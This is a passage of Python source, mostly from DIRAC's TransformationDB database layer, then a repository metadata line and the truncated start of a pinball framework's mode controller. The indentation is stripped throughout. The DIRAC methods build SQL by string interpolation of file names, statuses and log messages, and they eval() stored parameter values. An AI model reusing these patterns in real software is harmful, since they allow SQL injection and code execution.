gLogger.verbose( "Adding first %d files in TransformationFiles (out of %d)" % ( len( fileTuples ),
len( fileTuplesList ) ) )
req = "INSERT INTO TransformationFiles (TransformationID,Status,TaskID,FileID,TargetSE,UsedSE,LastUpdate) VALUES"
candidates = False
for ft in fileTuples:
_lfn, originalID, fileID, status, taskID, targetSE, usedSE, _errorCount, _lastUpdate, _insertTime = ft[:10]
if status not in ( 'Unused', 'Removed' ):
candidates = True
if not re.search( '-', status ):
status = "%s-inherited" % status
if taskID:
taskID = str( int( originalID ) ).zfill( 8 ) + '_' + str( int( taskID ) ).zfill( 8 )
req = "%s (%d,'%s','%s',%d,'%s','%s',UTC_TIMESTAMP())," % ( req, transID, status, taskID,
fileID, targetSE, usedSE )
if not candidates:
continue
req = req.rstrip( "," )
res = self._update( req, connection )
if not res['OK']:
return res
return S_OK()
def __assignTransformationFile( self, transID, taskID, se, fileIDs, connection = False ):
""" Make necessary updates to the TransformationFiles table for the newly created task
"""
req = "UPDATE TransformationFiles SET TaskID='%d',UsedSE='%s',Status='Assigned',LastUpdate=UTC_TIMESTAMP()"
req = ( req + " WHERE TransformationID = %d AND FileID IN (%s);" ) % ( taskID, se, transID, intListToString( fileIDs ) )
res = self._update( req, connection )
if not res['OK']:
gLogger.error( "Failed to assign file to task", res['Message'] )
fileTuples = []
for fileID in fileIDs:
fileTuples.append( ( "(%d,%d,%d)" % ( transID, fileID, taskID ) ) )
req = "INSERT INTO TransformationFileTasks (TransformationID,FileID,TaskID) VALUES %s" % ','.join( fileTuples )
res = self._update( req, connection )
if not res['OK']:
gLogger.error( "Failed to assign file to task", res['Message'] )
return res
def __setTransformationFileStatus( self, fileIDs, status, connection = False ):
req = "UPDATE TransformationFiles SET Status = '%s' WHERE FileID IN (%s);" % ( status, intListToString( fileIDs ) )
res = self._update( req, connection )
if not res['OK']:
gLogger.error( "Failed to update file status", res['Message'] )
return res
def __setTransformationFileUsedSE( self, fileIDs, usedSE, connection = False ):
req = "UPDATE TransformationFiles SET UsedSE = '%s' WHERE FileID IN (%s);" % ( usedSE, intListToString( fileIDs ) )
res = self._update( req, connection )
if not res['OK']:
gLogger.error( "Failed to update file usedSE", res['Message'] )
return res
def __resetTransformationFile( self, transID, taskID, connection = False ):
req = "UPDATE TransformationFiles SET TaskID=NULL, UsedSE='Unknown', Status='Unused'\
WHERE TransformationID = %d AND TaskID=%d;" % ( transID, taskID )
res = self._update( req, connection )
if not res['OK']:
gLogger.error( "Failed to reset transformation file", res['Message'] )
return res
def __deleteTransformationFiles( self, transID, connection = False ):
""" Remove the files associated to a transformation """
req = "DELETE FROM TransformationFiles WHERE TransformationID = %d;" % transID
res = self._update( req, connection )
if not res['OK']:
gLogger.error( "Failed to delete transformation files", res['Message'] )
return res
###########################################################################
#
# These methods manipulate the TransformationFileTasks table
#
def __deleteTransformationFileTask( self, transID, taskID, connection = False ):
''' Delete the file associated to a given task of a given transformation
from the TransformationFileTasks table for transformation with TransformationID and TaskID
'''
req = "DELETE FROM TransformationFileTasks WHERE TransformationID=%d AND TaskID=%d" % ( transID, taskID )
return self._update( req, connection )
def __deleteTransformationFileTasks( self, transID, connection = False ):
''' Remove all associations between files, tasks and a transformation '''
req = "DELETE FROM TransformationFileTasks WHERE TransformationID = %d;" % transID
res = self._update( req, connection )
if not res['OK']:
gLogger.error( "Failed to delete transformation files/task history", res['Message'] )
return res
###########################################################################
#
# These methods manipulate the TransformationTasks table
#
def getTransformationTasks( self, condDict = {}, older = None, newer = None, timeStamp = 'CreationTime',
orderAttribute = None, limit = None, inputVector = False,
offset = None, connection = False ):
connection = self.__getConnection( connection )
req = "SELECT %s FROM TransformationTasks %s" % ( intListToString( self.TASKSPARAMS ),
self.buildCondition( condDict, older, newer, timeStamp,
orderAttribute, limit, offset = offset ) )
res = self._query( req, connection )
if not res['OK']:
return res
webList = []
resultList = []
for row in res['Value']:
# Prepare the structure for the web
rList = []
taskDict = {}
count = 0
for item in row:
taskDict[self.TASKSPARAMS[count]] = item
count += 1
if type( item ) not in [IntType, LongType]:
rList.append( str( item ) )
else:
rList.append( item )
webList.append( rList )
if inputVector:
taskDict['InputVector'] = ''
taskID = taskDict['TaskID']
transID = taskDict['TransformationID']
res = self.getTaskInputVector( transID, taskID )
if res['OK']:
if res['Value'].has_key( taskID ):
taskDict['InputVector'] = res['Value'][taskID]
resultList.append( taskDict )
result = S_OK( resultList )
result['Records'] = webList
result['ParameterNames'] = self.TASKSPARAMS
return result
def getTasksForSubmission( self, transName, numTasks = 1, site = '', statusList = ['Created'],
older = None, newer = None, connection = False ):
""" Select tasks with the given status (and site) for submission """
res = self._getConnectionTransID( connection, transName )
if not res['OK']:
return res
connection = res['Value']['Connection']
transID = res['Value']['TransformationID']
condDict = {"TransformationID":transID}
if statusList:
condDict["ExternalStatus"] = statusList
if site:
numTasks = 0
res = self.getTransformationTasks( condDict = condDict, older = older, newer = newer,
timeStamp = 'CreationTime', orderAttribute = None, limit = numTasks,
inputVector = True, connection = connection )
if not res['OK']:
return res
tasks = res['Value']
# Now prepare the tasks
resultDict = {}
for taskDict in tasks:
if len( resultDict ) >= numTasks:
break
taskDict['Status'] = taskDict.pop( 'ExternalStatus' )
taskDict['InputData'] = taskDict.pop( 'InputVector' )
taskDict.pop( 'LastUpdateTime' )
taskDict.pop( 'CreationTime' )
taskDict.pop( 'ExternalID' )
taskID = taskDict['TaskID']
resultDict[taskID] = taskDict
if site:
resultDict[taskID]['Site'] = site
return S_OK( resultDict )
def deleteTasks( self, transName, taskIDbottom, taskIDtop, author = '', connection = False ):
""" Delete tasks with taskID range in transformation """
res = self._getConnectionTransID( connection, transName )
if not res['OK']:
return res
connection = res['Value']['Connection']
transID = res['Value']['TransformationID']
for taskID in range( taskIDbottom, taskIDtop + 1 ):
res = self.__removeTransformationTask( transID, taskID, connection = connection )
if not res['OK']:
return res
message = "Deleted tasks from %d to %d" % ( taskIDbottom, taskIDtop )
self.__updateTransformationLogging( transID, message, author, connection = connection )
return res
def reserveTask( self, transName, taskID, connection = False ):
""" Reserve the taskID from transformation for submission """
res = self._getConnectionTransID( connection, transName )
if not res['OK']:
return res
connection = res['Value']['Connection']
transID = res['Value']['TransformationID']
res = self.__checkUpdate( "TransformationTasks", "ExternalStatus", "Reserved", {"TransformationID":transID,
"TaskID":taskID},
connection = connection )
if not res['OK']:
return res
if not res['Value']:
return S_ERROR( 'Failed to set Reserved status for job %d - already Reserved' % int( taskID ) )
# The job is reserved, update the time stamp
res = self.setTaskStatus( transID, taskID, 'Reserved', connection = connection )
if not res['OK']:
return S_ERROR( 'Failed to set Reserved status for job %d - failed to update the time stamp' % int( taskID ) )
return S_OK()
def setTaskStatusAndWmsID( self, transName, taskID, status, taskWmsID, connection = False ):
""" Set status and ExternalID for job with taskID in production with transformationID
"""
res = self._getConnectionTransID( connection, transName )
if not res['OK']:
return res
connection = res['Value']['Connection']
transID = res['Value']['TransformationID']
res = self.__setTaskParameterValue( transID, taskID, 'ExternalStatus', status, connection = connection )
if not res['OK']:
return res
return self.__setTaskParameterValue( transID, taskID, 'ExternalID', taskWmsID, connection = connection )
def setTaskStatus( self, transName, taskID, status, connection = False ):
""" Set status for job with taskID in production with transformationID """
res = self._getConnectionTransID( connection, transName )
if not res['OK']:
return res
connection = res['Value']['Connection']
transID = res['Value']['TransformationID']
if type( taskID ) != ListType:
taskIDList = [taskID]
else:
taskIDList = list( taskID )
for taskID in taskIDList:
res = self.__setTaskParameterValue( transID, taskID, 'ExternalStatus', status, connection = connection )
if not res['OK']:
return res
return S_OK()
def getTransformationTaskStats( self, transName = '', connection = False ):
""" Returns dictionary with number of jobs per status for the given production.
"""
connection = self.__getConnection( connection )
if transName:
res = self._getTransformationID( transName, connection = connection )
if not res['OK']:
gLogger.error( "Failed to get ID for transformation", res['Message'] )
return res
res = self.getCounters( 'TransformationTasks', ['ExternalStatus'], {'TransformationID':res['Value']},
connection = connection )
else:
res = self.getCounters( 'TransformationTasks', ['ExternalStatus', 'TransformationID'], {},
connection = connection )
if not res['OK']:
return res
statusDict = {}
total = 0
for attrDict, count in res['Value']:
status = attrDict['ExternalStatus']
statusDict[status] = count
total += count
statusDict['TotalCreated'] = total
return S_OK( statusDict )
def __setTaskParameterValue( self, transID, taskID, paramName, paramValue, connection = False ):
req = "UPDATE TransformationTasks SET %s='%s', LastUpdateTime=UTC_TIMESTAMP()" % ( paramName, paramValue )
req = req + " WHERE TransformationID=%d AND TaskID=%d;" % ( transID, taskID )
return self._update( req, connection )
def __deleteTransformationTasks( self, transID, connection = False ):
""" Delete all the tasks from the TransformationTasks table for transformation with TransformationID
"""
req = "DELETE FROM TransformationTasks WHERE TransformationID=%d" % transID
return self._update( req, connection )
def __deleteTransformationTask( self, transID, taskID, connection = False ):
""" Delete the task from the TransformationTasks table for transformation with TransformationID
"""
req = "DELETE FROM TransformationTasks WHERE TransformationID=%d AND TaskID=%d" % ( transID, taskID )
return self._update( req, connection )
####################################################################
#
# These methods manipulate the TransformationInputDataQuery table
#
def createTransformationInputDataQuery( self, transName, queryDict, author = '', connection = False ):
res = self._getConnectionTransID( connection, transName )
if not res['OK']:
return res
connection = res['Value']['Connection']
transID = res['Value']['TransformationID']
return self.__addInputDataQuery( transID, queryDict, author = author, connection = connection )
def __addInputDataQuery( self, transID, queryDict, author = '', connection = False ):
res = self.getTransformationInputDataQuery( transID, connection = connection )
if res['OK']:
return S_ERROR( "Input data query already exists for transformation" )
if res['Message'] != 'No InputDataQuery found for transformation':
return res
for parameterName in sorted( queryDict.keys() ):
parameterValue = queryDict[parameterName]
if not parameterValue:
continue
parameterType = 'String'
if type( parameterValue ) in [ListType, TupleType]:
if type( parameterValue[0] ) in [IntType, LongType]:
parameterType = 'Integer'
parameterValue = [str( x ) for x in parameterValue]
parameterValue = ';;;'.join( parameterValue )
else:
if type( parameterValue ) in [IntType, LongType]:
parameterType = 'Integer'
parameterValue = str( parameterValue )
if type( parameterValue ) == DictType:
parameterType = 'Dict'
parameterValue = str( parameterValue )
res = self.insertFields( 'TransformationInputDataQuery', ['TransformationID', 'ParameterName',
'ParameterValue', 'ParameterType'],
[transID, parameterName, parameterValue, parameterType], conn = connection )
if not res['OK']:
message = 'Failed to add input data query'
self.deleteTransformationInputDataQuery( transID, connection = connection )
break
else:
message = 'Added input data query'
self.__updateTransformationLogging( transID, message, author, connection = connection )
return res
def deleteTransformationInputDataQuery( self, transName, author = '', connection = False ):
res = self._getConnectionTransID( connection, transName )
if not res['OK']:
return res
connection = res['Value']['Connection']
transID = res['Value']['TransformationID']
req = "DELETE FROM TransformationInputDataQuery WHERE TransformationID=%d;" % transID
res = self._update( req, connection )
if not res['OK']:
return res
if res['Value']:
# Add information to the transformation logging
message = 'Deleted input data query'
self.__updateTransformationLogging( transID, message, author, connection = connection )
return res
def getTransformationInputDataQuery( self, transName, connection = False ):
res = self._getConnectionTransID( connection, transName )
if not res['OK']:
return res
connection = res['Value']['Connection']
transID = res['Value']['TransformationID']
req = "SELECT ParameterName,ParameterValue,ParameterType FROM TransformationInputDataQuery"
req = req + " WHERE TransformationID=%d;" % transID
res = self._query( req, connection )
if not res['OK']:
return res
queryDict = {}
for parameterName, parameterValue, parameterType in res['Value']:
if re.search( ';;;', str( parameterValue ) ):
parameterValue = parameterValue.split( ';;;' )
if parameterType == 'Integer':
parameterValue = [int( x ) for x in parameterValue]
elif parameterType == 'Integer':
parameterValue = int( parameterValue )
elif parameterType == 'Dict':
parameterValue = eval( parameterValue )
queryDict[parameterName] = parameterValue
if not queryDict:
return S_ERROR( "No InputDataQuery found for transformation" )
return S_OK( queryDict )
###########################################################################
#
# These methods manipulate the TaskInputs table
#
def getTaskInputVector( self, transName, taskID, connection = False ):
""" Get input vector for the given task """
res = self._getConnectionTransID( connection, transName )
if not res['OK']:
return res
connection = res['Value']['Connection']
transID = res['Value']['TransformationID']
if type( taskID ) != ListType:
taskIDList = [taskID]
else:
taskIDList = list( taskID )
taskString = ','.join( ["'" + str( x ) + "'" for x in taskIDList] )
req = "SELECT TaskID,InputVector FROM TaskInputs WHERE TaskID in (%s) AND TransformationID='%d';" % ( taskString,
transID )
res = self._query( req )
inputVectorDict = {}
if res['OK'] and res['Value']:
for row in res['Value']:
inputVectorDict[row[0]] = row[1]
return S_OK( inputVectorDict )
def __insertTaskInputs( self, transID, taskID, lfns, connection = False ):
vector = str.join( ';', lfns )
fields = ['TransformationID', 'TaskID', 'InputVector']
values = [transID, taskID, vector]
res = self.insertFields( 'TaskInputs', fields, values, connection )
if not res['OK']:
gLogger.error( "Failed to add input vector to task %d" % taskID )
return res
def __deleteTransformationTaskInputs( self, transID, taskID = 0, connection = False ):
""" Delete all the tasks inputs from the TaskInputs table for transformation with TransformationID
"""
req = "DELETE FROM TaskInputs WHERE TransformationID=%d" % transID
if taskID:
req = "%s AND TaskID=%d" % ( req, int( taskID ) )
return self._update( req, connection )
###########################################################################
#
# These methods manipulate the TransformationLog table
#
def __updateTransformationLogging( self, transName, message, authorDN, connection = False ):
""" Update the Transformation log table with any modifications
"""
if not authorDN:
res = getProxyInfo( False, False )
if res['OK']:
authorDN = res['Value']['subject']
res = self._getConnectionTransID( connection, transName )
if not res['OK']:
return res
connection = res['Value']['Connection']
transID = res['Value']['TransformationID']
req = "INSERT INTO TransformationLog (TransformationID,Message,Author,MessageDate)"
req = req + " VALUES (%s,'%s','%s',UTC_TIMESTAMP());" % ( transID, message, authorDN )
return self._update( req, connection )
def getTransformationLogging( self, transName, connection = False ):
""" Get logging info from the TransformationLog table
"""
res = self._getConnectionTransID( connection, transName )
if not res['OK']:
return res
connection = res['Value']['Connection']
transID = res['Value']['TransformationID']
req = "SELECT TransformationID, Message, Author, MessageDate FROM TransformationLog"
req = req + " WHERE TransformationID=%s ORDER BY MessageDate;" % ( transID )
res = self._query( req )
if not res['OK']:
return res
transList = []
for transID, message, authorDN, messageDate in res['Value']:
transDict = {}
transDict['TransformationID'] = transID
transDict['Message'] = message
transDict['AuthorDN'] = authorDN
transDict['MessageDate'] = messageDate
transList.append( transDict )
return S_OK( transList )
def __deleteTransformationLog( self, transID, connection = False ):
""" Remove the entries in the transformation log for a transformation
"""
req = "DELETE FROM TransformationLog WHERE TransformationID=%d;" % transID
return self._update( req, connection )
###########################################################################
#
# These methods manipulate the DataFiles table
#
def __getAllFileIDs( self, connection = False ):
""" Get all the fileIDs for the supplied list of lfns
"""
req = "SELECT LFN,FileID FROM DataFiles;"
res = self._query( req, connection )
if not res['OK']:
return res
fids = {}
lfns = {}
for lfn, fileID in res['Value']:
fids[fileID] = lfn
lfns[lfn] = fileID
return S_OK( ( fids, lfns ) )
def __getFileIDsForLfns( self, lfns, connection = False ):
""" Get file IDs for the given list of lfns
warning: if the file is not present, we'll see no errors
"""
req = "SELECT LFN,FileID FROM DataFiles WHERE LFN in (%s);" % ( stringListToString( lfns ) )
res = self._query( req, connection )
if not res['OK']:
return res
fids = {}
lfns = {}
for lfn, fileID in res['Value']:
fids[fileID] = lfn
lfns[lfn] = fileID
return S_OK( ( fids, lfns ) )
def __getLfnsForFileIDs( self, fileIDs, connection = False ):
""" Get lfns for the given list of fileIDs
"""
req = "SELECT LFN,FileID FROM DataFiles WHERE FileID in (%s);" % stringListToString( fileIDs )
res = self._query( req, connection )
if not res['OK']:
return res
fids = {}
lfns = {}
for lfn, fileID in res['Value']:
fids[lfn] = fileID
lfns[fileID] = lfn
return S_OK( ( fids, lfns ) )
def __addDataFiles( self, lfns, connection = False ):
""" Add a file to the DataFiles table and retrieve the FileIDs
"""
res = self.__getFileIDsForLfns( lfns, connection = connection )
if not res['OK']:
return res
_fileIDs, lfnFileIDs = res['Value']
for lfn in lfns:
if not lfn in lfnFileIDs.keys():
req = "INSERT INTO DataFiles (LFN,Status) VALUES ('%s','New');" % lfn
res = self._update( req, connection )
if not res['OK']:
return res
lfnFileIDs[lfn] = res['lastRowId']
return S_OK( lfnFileIDs )
def __setDataFileStatus( self, fileIDs, status, connection = False ):
""" Set the status of the supplied files
"""
req = "UPDATE DataFiles SET Status = '%s' WHERE FileID IN (%s);" % ( status, intListToString( fileIDs ) )
return self._update( req, connection )
###########################################################################
#
# These methods manipulate multiple tables
#
def addTaskForTransformation( self, transID, lfns = [], se = 'Unknown', connection = False ):
""" Create a new task with the supplied files for a transformation.
"""
res = self._getConnectionTransID( connection, transID )
if not res['OK']:
return res
connection = res['Value']['Connection']
transID = res['Value']['TransformationID']
# Be sure the all the supplied LFNs are known to the database for the supplied transformation
fileIDs = []
if lfns:
res = self.getTransformationFiles( condDict = {'TransformationID':transID, 'LFN':lfns}, connection = connection )
if not res['OK']:
return res
foundLfns = set()
for fileDict in res['Value']:
fileIDs.append( fileDict['FileID'] )
lfn = fileDict['LFN']
if fileDict['Status'] in self.allowedStatusForTasks:
foundLfns.add( lfn )
else:
gLogger.error( "Supplied file not in %s status but %s" % ( self.allowedStatusForTasks, fileDict['Status'] ), lfn )
unavailableLfns = set( lfns ) - foundLfns
if unavailableLfns:
gLogger.error( "Supplied files not found for transformation", sorted( unavailableLfns ) )
return S_ERROR( "Not all supplied files available in the transformation database" )
# Insert the task into the jobs table and retrieve the taskID
self.lock.acquire()
req = "INSERT INTO TransformationTasks(TransformationID, ExternalStatus, ExternalID, TargetSE,"
req = req + " CreationTime, LastUpdateTime)"
req = req + " VALUES (%s,'%s','%d','%s', UTC_TIMESTAMP(), UTC_TIMESTAMP());" % ( transID, 'Created', 0, se )
res = self._update( req, connection )
if not res['OK']:
self.lock.release()
gLogger.error( "Failed to publish task for transformation", res['Message'] )
return res
# With InnoDB, TaskID is computed by a trigger, which sets the local variable @last (per connection)
# @last is the last insert TaskID. With multi-row inserts, will be the first new TaskID inserted.
# The trigger TaskID_Generator must be present with the InnoDB schema (defined in TransformationDB.sql)
if self.isTransformationTasksInnoDB:
res = self._query( "SELECT @last;", connection )
else:
res = self._query( "SELECT LAST_INSERT_ID();", connection )
self.lock.release()
if not res['OK']:
return res
taskID = int( res['Value'][0][0] )
gLogger.verbose( "Published task %d for transformation %d." % ( taskID, transID ) )
# If we have input data then update their status, and taskID in the transformation table
if lfns:
res = self.__insertTaskInputs( transID, taskID, lfns, connection = connection )
if not res['OK']:
self.__removeTransformationTask( transID, taskID, connection = connection )
return res
res = self.__assignTransformationFile( transID, taskID, se, fileIDs, connection = connection )
if not res['OK']:
self.__removeTransformationTask( transID, taskID, connection = connection )
return res
return S_OK( taskID )
def extendTransformation( self, transName, nTasks, author = '', connection = False ):
""" Extend SIMULATION type transformation by nTasks number of tasks
"""
connection = self.__getConnection( connection )
res = self.getTransformation( transName, connection = connection )
if not res['OK']:
gLogger.error( "Failed to get transformation details", res['Message'] )
return res
transType = res['Value']['Type']
transID = res['Value']['TransformationID']
extendableProds = Operations().getValue( 'Transformations/ExtendableTransfTypes', ['Simulation', 'MCSimulation'] )
if transType.lower() not in [ep.lower() for ep in extendableProds]:
return S_ERROR( 'Can not extend non-SIMULATION type production' )
taskIDs = []
for _task in range( nTasks ):
res = self.addTaskForTransformation( transID, connection = connection )
if not res['OK']:
return res
taskIDs.append( res['Value'] )
# Add information to the transformation logging
message = 'Transformation extended by %d tasks' % nTasks
self.__updateTransformationLogging( transName, message, author, connection = connection )
return S_OK( taskIDs )
def cleanTransformation( self, transName, author = '', connection = False ):
""" Clean the transformation specified by name or id """
res = self._getConnectionTransID( connection, transName )
if not res['OK']:
return res
connection = res['Value']['Connection']
transID = res['Value']['TransformationID']
res = self.__deleteTransformationFileTasks( transID, connection = connection )
if not res['OK']:
return res
res = self.__deleteTransformationFiles( transID, connection = connection )
if not res['OK']:
return res
res = self.__deleteTransformationTaskInputs( transID, connection = connection )
if not res['OK']:
return res
res = self.__deleteTransformationTasks( transID, connection = connection )
if not res['OK']:
return res
self.__updateTransformationLogging( transID, "Transformation Cleaned", author, connection = connection )
return S_OK( transID )
def deleteTransformation( self, transName, author = '', connection = False ):
""" Remove the transformation specified by name or id """
res = self._getConnectionTransID( connection, transName )
if not res['OK']:
return res
connection = res['Value']['Connection']
transID = res['Value']['TransformationID']
res = self.cleanTransformation( transID, author = author, connection = connection )
if not res['OK']:
return res
res = self.__deleteTransformationLog( transID, connection = connection )
if not res['OK']:
return res
res = self.__deleteTransformationParameters( transID, connection = connection )
if not res['OK']:
return res
res = self.__deleteTransformation( transID, connection = connection )
if not res['OK']:
return res
res = self.__updateFilters()
if not res['OK']:
return res
return S_OK()
def __removeTransformationTask( self, transID, taskID, connection = False ):
res = self.__deleteTransformationTaskInputs( transID, taskID, connection = connection )
if not res['OK']:
return res
res = self.__deleteTransformationFileTask( transID, taskID, connection = connection )
if not res['OK']:
return res
res = self.__resetTransformationFile( transID, taskID, connection = connection )
if not res['OK']:
return res
return self.__deleteTransformationTask( transID, taskID, connection = connection )
def __checkUpdate( self, table, param, paramValue, selectDict = {}, connection = False ):
""" Check whether the update will perform an update """
req = "UPDATE %s SET %s = '%s'" % ( table, param, paramValue )
if selectDict:
req = "%s %s" % ( req, self.buildCondition( selectDict ) )
return self._update( req, connection )
def __getConnection( self, connection ):
if connection:
return connection
res = self._getConnection()
if res['OK']:
return res['Value']
gLogger.warn( "Failed to get MySQL connection", res['Message'] )
return connection
def _getConnectionTransID( self, connection, transName ):
connection = self.__getConnection( connection )
res = self._getTransformationID( transName, connection = connection )
if not res['OK']:
gLogger.error( "Failed to get ID for transformation", res['Message'] )
return res
transID = res['Value']
resDict = {'Connection':connection, 'TransformationID':transID}
return S_OK( resDict )
####################################################################################
#
# This part should correspond to the DIRAC Standard File Catalog interface
#
####################################################################################
def exists( self, lfns, connection = False ):
""" Check the presence of the lfn in the TransformationDB DataFiles table
"""
gLogger.info( "TransformationDB.exists: Attempting to determine existence of %s files." % len( lfns ) )
res = self.__getFileIDsForLfns( lfns, connection = connection )
if not res['OK']:
return res
fileIDs, _lfnFilesIDs = res['Value']
failed = {}
successful = {}
fileIDsValues = set( fileIDs.values() )
for lfn in lfns:
if not lfn in fileIDsValues:
successful[lfn] = False
else:
successful[lfn] = True
resDict = {'Successful':successful, 'Failed':failed}
return S_OK( resDict )
def addFile( self, fileDicts, force = False, connection = False ):
""" Add a new file to the TransformationDB together with its first replica.
In the input dict, the only mandatory info are PFN and SE
"""
gLogger.info( "TransformationDB.addFile: Attempting to add %s files." % len( fileDicts.keys() ) )
successful = {}
failed = {}
# Determine which files pass the filters and are to be added to transformations
transFiles = {}
filesToAdd = []
for lfn in fileDicts.keys():
fileTrans = self.__filterFile( lfn )
if not ( fileTrans or force ):
successful[lfn] = True
else:
filesToAdd.append( lfn )
for trans in fileTrans:
if not transFiles.has_key( trans ):
transFiles[trans] = []
transFiles[trans].append( lfn )
# Add the files to the DataFiles and Replicas tables
if filesToAdd:
connection = self.__getConnection( connection )
res = self.__addDataFiles( filesToAdd, connection = connection )
if not res['OK']:
return res
lfnFileIDs = res['Value']
for lfn in filesToAdd:
if lfnFileIDs.has_key( lfn ):
successful[lfn] = True
else:
failed[lfn] = True
# Add the files to the transformations
# TODO: THIS SHOULD BE TESTED WITH A TRANSFORMATION WITH A FILTER
for transID, lfns in transFiles.items():
fileIDs = []
for lfn in lfns:
if lfnFileIDs.has_key( lfn ):
fileIDs.append( lfnFileIDs[lfn] )
if fileIDs:
res = self.__addFilesToTransformation( transID, fileIDs, connection = connection )
if not res['OK']:
gLogger.error( "Failed to add files to transformation", "%s %s" % ( transID, res['Message'] ) )
failed[lfn] = True
successful[lfn] = False
else:
successful[lfn] = True
resDict = {'Successful':successful, 'Failed':failed}
return S_OK( resDict )
def removeFile( self, lfns, connection = False ):
""" Remove file specified by lfn from the ProcessingDB
"""
gLogger.info( "TransformationDB.removeFile: Attempting to remove %s files." % len( lfns ) )
failed = {}
successful = {}
connection = self.__getConnection( connection )
if not lfns:
return S_ERROR( "No LFNs supplied" )
res = self.__getFileIDsForLfns( lfns, connection = connection )
if not res['OK']:
return res
fileIDs, lfnFilesIDs = res['Value']
for lfn in lfns:
if not lfnFilesIDs.has_key( lfn ):
successful[lfn] = 'File did not exist'
if fileIDs:
res = self.__setTransformationFileStatus( fileIDs.keys(), 'Deleted', connection = connection )
if not res['OK']:
return res
res = self.__setDataFileStatus( fileIDs.keys(), 'Deleted', connection = connection )
if not res['OK']:
return S_ERROR( "TransformationDB.removeFile: Failed to remove files." )
for lfn in lfnFilesIDs.keys():
if not failed.has_key( lfn ):
successful[lfn] = True
resDict = {'Successful':successful, 'Failed':failed}
return S_OK( resDict )
def addDirectory( self, path, force = False ):
""" Adds all the files stored in a given directory in file catalog """
gLogger.info( "TransformationDB.addDirectory: Attempting to populate %s." % path )
res = pythonCall( 30, self.__addDirectory, path, force )
if not res['OK']:
gLogger.error( "Failed to invoke addDirectory with shifter proxy" )
return res
return res['Value']
def __addDirectory( self, path, force ):
res = setupShifterProxyInEnv( "ProductionManager" )
if not res['OK']:
return S_OK( "Failed to setup shifter proxy" )
catalog = FileCatalog()
start = time.time()
res = catalog.listDirectory( path )
if not res['OK']:
gLogger.error( "TransformationDB.addDirectory: Failed to get files. %s" % res['Message'] )
return res
if not path in res['Value']['Successful']:
gLogger.error( "TransformationDB.addDirectory: Failed to get files." )
return res
gLogger.info( "TransformationDB.addDirectory: Obtained %s files in %s seconds." % ( path, time.time() - start ) )
successful = []
failed = []
for lfn in res['Value']['Successful'][path]["Files"].keys():
res = self.addFile( {lfn:{}}, force = force )
if not res['OK']:
failed.append( lfn )
continue
if not lfn in res['Value']['Successful']:
failed.append( lfn )
else:
successful.append( lfn )
return {"OK":True, "Value": len( res['Value']['Successful'] ), "Successful":successful, "Failed": failed }
|
calancha/DIRAC
|
TransformationSystem/DB/TransformationDB.py
|
Python
|
gpl-3.0
| 68,155
|
[
"DIRAC"
] |
f41f5bca60c1fd90a2f24dfe447b4ff90a04dc0d7e5a0705a21ec9f281160a3b
|
""" """
# mode_controller.py
# Mission Pinball Framework
# Written by Brian Madden & Gabe Knuth
# Released under the MIT License. (See license info at the end of this file.)
# Documentation and more info at http://missionpinball.com/mpf
import logging
import os
from collections import namedtuple
from mpf.system.utility_functions import Util
from mpf.system.config import Config
from mpf.media_controller.core.mode import Mode
RemoteMethod = namedtuple('RemoteMethod', 'method config_section kwargs priority',
verbose=False)
"""RemotedMethod is used by other modules that want to register a method to
be called on mode_start or mode_stop.
"""
class ModeController(object):
"""Parent class for the Mode Controller. There is one instance of this in
MPF and it's responsible for loading, unloading, and managing all game
modes.
"""
def __init__(self, machine):
self.machine = machine
self.log = logging.getLogger('ModeController')
self.active_modes = list()
self.mode_stop_count = 0
# The following two lists hold namedtuples of any remote components that
# need to be notified when a mode object is created and/or started.
self.loader_methods = list()
self.start_methods = list()
if 'modes' in self.machine.config:
self.machine.events.add_handler('init_phase_4',
self._load_modes)
def _load_modes(self):
#Loads the modes from the Modes: section of the machine configuration
#file.
for mode in set(self.machine.config['modes']):
self.machine.modes[mode] = self._load_mode(mode)
def _load_mode(self, mode_string):
"""Loads a mode, reads in its config, and creates the Mode object.
Args:
mode: String name of the mode you're loading. This is the name of
the mode's folder in your game's machine_files/modes folder.
"""
self.log.debug('Processing mode: %s', mode_string)
config = dict()
# find the folder for this mode:
mode_path = os.path.join(self.machine.machine_path,
self.machine.config['media_controller']['paths']['modes'], mode_string)
if not os.path.exists(mode_path):
mode_path = os.path.abspath(os.path.join('mpf', self.machine.config['media_controller']['paths']['modes'], mode_string))
# Is there an MPF default config for this mode? If so, load it first
mpf_mode_config = os.path.join(
'mpf',
self.machine.config['media_controller']['paths']['modes'],
mode_string,
'config',
mode_string + '.yaml')
if os.path.isfile(mpf_mode_config):
config = Config.load_config_file(mpf_mode_config)
# Now figure out if there's a machine-specific config for this mode, and
# if so, merge it into the config
mode_config_folder = os.path.join(self.machine.machine_path,
self.machine.config['media_controller']['paths']['modes'], mode_string, 'config')
found_file = False
for path, _, files in os.walk(mode_config_folder):
for file in files:
file_root, file_ext = os.path.splitext(file)
if file_root == mode_string:
config = Util.dict_merge(config,
Config.load_config_file(os.path.join(path, file)))
found_file = True
break
if found_file:
break
return Mode(self.machine, config, mode_string, mode_path)
def register_load_method(self, load_method, config_section_name=None,
priority=0, **kwargs):
"""Used by system components, plugins, etc. to register themselves with
the Mode Controller for anything they need a mode to do when it's
registered.
Args:
load_method: The method that will be called when this mode code
loads.
config_section_name: An optional string for the section of the
configuration file that will be passed to the load_method when
it's called.
priority: Int of the relative priority which allows remote methods
to be called in a specific order. Default is 0. Higher values
will be called first.
**kwargs: Any additional keyword arguments specified will be passed
to the load_method.
Note that these methods will be called once, when the mode code is first
initialized during the MPF boot process.
"""
self.loader_methods.append(RemoteMethod(method=load_method,
config_section=config_section_name, kwargs=kwargs,
priority=priority))
self.loader_methods.sort(key=lambda x: x.priority, reverse=True)
def register_start_method(self, start_method, config_section_name=None,
priority=0, **kwargs):
"""Used by system components, plugins, etc. to register themselves with
the Mode Controller for anything that they a mode to do when it starts.
Args:
start_method: The method that will be called when this mode code
loads.
config_section_name: An optional string for the section of the
configuration file that will be passed to the start_method when
it's called.
priority: Int of the relative priority which allows remote methods
to be called in a specific order. Default is 0. Higher values
will be called first.
**kwargs: Any additional keyword arguments specified will be passed
to the start_method.
Note that these methods will be called every single time this mode is
started.
"""
self.start_methods.append(RemoteMethod(method=start_method,
config_section=config_section_name, priority=priority,
kwargs=kwargs))
self.start_methods.sort(key=lambda x: x.priority, reverse=True)
def _active_change(self, mode, active):
# called when a mode goes active or inactive
if active:
self.active_modes.append(mode)
else:
self.active_modes.remove(mode)
# sort the active mode list by priority
self.active_modes.sort(key=lambda x: x.priority, reverse=True)
self.dump()
def dump(self):
"""Dumps the current status of the running modes to the log file."""
